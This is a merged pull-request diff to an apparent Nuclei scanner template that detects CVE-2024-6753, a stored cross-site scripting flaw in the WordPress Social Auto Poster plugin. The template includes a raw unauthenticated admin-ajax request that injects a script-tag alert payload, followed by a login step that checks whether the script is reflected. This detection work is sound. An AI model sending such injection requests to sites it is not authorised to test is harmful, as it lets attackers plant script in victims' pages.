Merge pull request #14688 from Sechunt3r/patch-21

Fix CVE-2024-6753 YAML configuration

Author: pussycat0x

http/cves/2024/CVE-2024-6753.yaml

@@ -11,9 +11,9 @@ info:
   remediation: |
     Update to the latest version of the plugin where the vulnerability is fixed.
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2024-6753
     - https://www.wordfence.com/threat-intel/vulnerabilities/id/3c268a6d-dfb4-4a9d-802e-80e5c1c53ca2
     - https://patchstack.com/database/vulnerability/social-auto-poster/wordpress-social-auto-poster-plugin-5-3-14-unauthenticated-stored-cross-site-scripting-vulnerability
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-6753
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
     cvss-score: 7.2
@@ -28,44 +28,44 @@ info:
     fofa-query: body="social-auto-poster"
   tags: cve,cve2024,wordpress,wp,wp-plugin,social-auto-poster,xss,vkev
 
-flow: http(1) && http(2) && http(3) && http(4)
+flow: (http(1) && http(2)) || (http(3) && http(4))
 
 http:
   - raw:
       - |
-        POST /wp-admin/admin-ajax.php HTTP/1.1
+        GET / HTTP/1.1
         Host: {{Hostname}}
-        Content-Type: application/x-www-form-urlencoded
-        X-Requested-With: XMLHttpRequest
-
-        action=wpw_auto_poster_map_wordpress_post_type&mapTypes=xss_test:<script>alert(document.domain)</script>&postType=post
 
     matchers:
       - type: dsl
         dsl:
+          - 'contains(body, "/wp-content/plugins/")'
           - 'status_code == 200'
-          - 'contains(body, "\"status\":\"success\"")'
         condition: and
         internal: true
 
   - raw:
       - |
-        GET /wp-login.php HTTP/1.1
+        POST /wp-admin/admin-ajax.php HTTP/1.1
         Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        action=wpw_auto_poster_map_wordpress_post_type&mapTypes=xss_test:<script>alert(document.domain)</script>&postType=post
 
     matchers:
       - type: dsl
         dsl:
+          - 'contains(body, "{\"status\":\"success\"}")'
+          - 'contains(content_type, "text/html")'
           - 'status_code == 200'
-          - 'contains(header, "wordpress_test_cookie")'
         condition: and
-        internal: true
 
   - raw:
       - |
         POST /wp-login.php HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
+        Cookie: wordpress_test_cookie=WP+Cookie+check
 
         log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
 
@@ -88,5 +88,4 @@ http:
           - 'contains(body, "<script>alert(document.domain)</script>")'
           - 'contains(content_type, "text/html")'
           - 'status_code == 200'
-        condition: and
-# digest: 4b0a00483046022100c6aa05f7b3bf88b27f989ca835570d53b04d3a1c40d557b186fd25f253840aea022100ffb63d8fa3f4c8199170034adad3ebd1d4d819e583fc2fcd7f4e26894cd829ac:922c64590222798bb761d5b6d8e72950
+        condition: and